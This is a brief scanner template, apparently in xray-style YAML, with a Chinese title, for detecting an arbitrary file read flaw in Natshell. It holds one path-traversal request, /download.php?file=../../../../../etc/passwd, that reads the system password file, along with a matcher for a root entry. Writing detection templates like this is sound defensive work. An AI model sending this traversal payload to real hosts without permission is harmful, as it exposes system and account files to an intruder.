漏洞描述
Natshell 任意文件读取漏洞
id: natshell-arbitrary-file-read
info:
name: Natshell Arbitrary File Read
author: Print1n
severity: high
verified: true
description: |-
Natshell 任意文件读取漏洞
tags: natshell,arbitrary-file-read
created: 2024/07/20
rules:
r0:
request:
method: GET
path: /download.php?file=../../../../../etc/passwd
expression: response.status == 200 && "(root|toor):[x*]:0:0:".bmatches(response.body)
expression: r0()